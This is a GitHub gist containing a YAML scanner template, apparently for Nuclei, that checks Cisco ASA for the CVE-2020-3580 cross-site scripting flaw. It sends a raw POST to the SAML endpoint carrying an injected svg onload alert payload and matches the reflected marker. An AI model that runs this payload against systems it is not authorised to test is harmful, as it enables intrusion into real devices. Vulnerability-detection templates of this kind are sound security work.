Created
June 28, 2021 05:09
-
-
Save 0x240x23elu/c99d44376ffda02b1a4a05a1037cb126 to your computer and use it in GitHub Desktop.
CVE-2020-3580
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: CVE-2020-3580 | |
info: | |
name: xss in cisco ASA | |
author: 0x240x23elu | |
severity: high | |
description: xss in cisco ASA | |
tags: cve,cve2020,cisco | |
requests: | |
- raw: | |
- | | |
POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 | |
Host: {{hostname}} | |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate | |
Connection: close | |
Upgrade-Insecure-Requests: 1 | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 48 | |
SAMLResponse="><svg/onload=alert('0x240x23elu')> | |
matchers-condition: and | |
matchers: | |
- type: word | |
words: | |
- "0x240x23elu" | |
condition: and | |
part: body |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment